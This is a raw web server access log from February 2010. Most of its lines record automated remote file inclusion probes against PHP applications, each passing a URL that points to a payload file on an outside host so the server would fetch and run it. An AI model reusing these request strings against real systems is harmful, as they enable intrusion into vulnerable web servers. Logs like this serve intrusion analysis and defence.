210.127.209.105 - - [14/Feb/2010:08:20:24 -0800] "GET /logs/access_100109.log//bbs/skin/buzzard_espoon/setup.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
210.127.209.105 - - [14/Feb/2010:08:20:24 -0800] "GET /logs//bbs/skin/buzzard_espoon/setup.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:20:25 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:20:25 -0800] "GET /logs/access_100107.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:20:25 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:08:20:32 -0800] "GET /logs/access_100129.log%20%20/classes/adodbt/sql.php?classes_dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:33 -0800] "GET /logs/access_100109.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:33 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:33 -0800] "GET /logs/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:34 -0800] "GET /index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:36 -0800] "GET /logs/access_100109.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:36 -0800] "GET /logs/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:37 -0800] "GET /index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:20:37 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:20:46 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:20:46 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:08:20:46 -0800] "GET /logs/access_100107.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:21:49 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.39.137.162 - - [14/Feb/2010:08:21:50 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.218.169 - - [14/Feb/2010:08:22:54 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
65.55.218.169 - - [14/Feb/2010:08:22:55 -0800] "GET /atesh_info/lt.php?t=2828464647 HTTP/1.1" 200 88 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
203.251.80.167 - - [14/Feb/2010:08:23:10 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:23:28 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:23:28 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:24:04 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:24:38 -0800] "GET /appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:24:38 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:24:39 -0800] "GET /logs//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:24:47 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:24:47 -0800] "GET /logs//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:24:47 -0800] "GET /appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:25:03 -0800] "GET /logs/access_100130.log%20%20/mcf.php?content=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:06 -0800] "GET /logs/access_100121.log%20%20//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:06 -0800] "GET /bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:06 -0800] "GET /logs//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:25:26 -0800] "GET /logs/access_100131.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:25:26 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:25:26 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:42 -0800] "GET /bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:42 -0800] "GET /logs/access_100121.log%20%20//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:45 -0800] "GET /logs//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:58 -0800] "GET /bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:58 -0800] "GET /logs/access_100121.log%20%20//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:25:58 -0800] "GET /logs//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:26:07 -0800] "GET /logs/access_100109.log%20%20//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:26:25 -0800] "GET /logs/access_100109.log%20%20//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:26:27 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:26:27 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:26:27 -0800] "GET /appserv/main.php?appserv_root=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:26:30 -0800] "GET /logs/access_100202.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:26:44 -0800] "GET /logs/access_100109.log%20%20//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:26:50 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:26:50 -0800] "GET /logs/access_100131.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:26:50 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:27:03 -0800] "GET /logs/access.log//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:27:12 -0800] "GET /write_ok.php?board_skin_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:27:12 -0800] "GET /logs/access_100208.log//write_ok.php?board_skin_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:27:13 -0800] "GET /logs//write_ok.php?board_skin_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:27:17 -0800] "GET /logs/access_100103.log//write_ok.php?board_skin_path=http://www.blve.jp/html/uploads/office1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:08:27:17 -0800] "GET /logs/access_100115.log%20%20/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:08:27:17 -0800] "GET /agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:08:27:17 -0800] "GET /logs/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:27:19 -0800] "GET /write_ok.php?board_skin_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:27:19 -0800] "GET /logs//write_ok.php?board_skin_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:27:20 -0800] "GET /logs/access_100208.log//write_ok.php?board_skin_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:08:27:20 -0800] "GET /logs/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:08:27:20 -0800] "GET /agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:08:27:20 -0800] "GET /logs/access_100115.log%20%20/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [14/Feb/2010:08:27:23 -0800] "GET /logs/access_100103.log//write_ok.php?board_skin_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:27:49 -0800] "GET /logs/access_100202.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:27:52 -0800] "GET /logs/access_100115.log%20%20/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:27:52 -0800] "GET /logs/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:27:52 -0800] "GET /agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:28:15 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:28:15 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:28:15 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:28:16 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:28:16 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:28:16 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:28:41 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:28:42 -0800] "GET /bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:28:42 -0800] "GET /logs/access_100121.log//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:28:46 -0800] "GET /logs/access_100109.log//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:28:47 -0800] "GET /logs/access_100109.log//bb_lib/checkdb.inc.php?libpach=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:28:55 -0800] "GET /agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:28:56 -0800] "GET /logs/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:28:56 -0800] "GET /logs/access_100115.log%20%20/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [14/Feb/2010:08:29:08 -0800] "GET /include/admin.lib.inc.php?site_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:29:09 -0800] "GET /logs/access_100115.log/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:29:45 -0800] "GET /errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:29:45 -0800] "GET /logs/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:29:45 -0800] "GET /logs/access_100111.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:29:45 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [14/Feb/2010:08:30:00 -0800] "GET /write_ok.php?board_skin_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [14/Feb/2010:08:30:00 -0800] "GET /logs/access_100208.log%20%20//write_ok.php?board_skin_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [14/Feb/2010:08:30:02 -0800] "GET /logs//write_ok.php?board_skin_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:30:10 -0800] "GET /logs/access_100123.log%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:30:13 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:30:13 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:30:13 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:30:13 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:30:15 -0800] "GET /logs/access_100123.log%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:30:15 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:30:15 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:30:15 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [14/Feb/2010:08:30:24 -0800] "GET /logs/access_100103.log%20%20//write_ok.php?board_skin_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:30:26 -0800] "GET /logs/access_100111.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:08:30:31 -0800] "GET /logs/access_100115.log/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:30:43 -0800] "GET /logs/access_100112.log//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:08:30:57 -0800] "GET /logs/access_100115.log/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:31:02 -0800] "GET /logs/access_100123.log%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:31:05 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:31:05 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [14/Feb/2010:08:31:30 -0800] "GET /logs/access_100112.log/include/admin.lib.inc.php?site_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
210.127.209.105 - - [14/Feb/2010:08:31:30 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:31:47 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:31:47 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
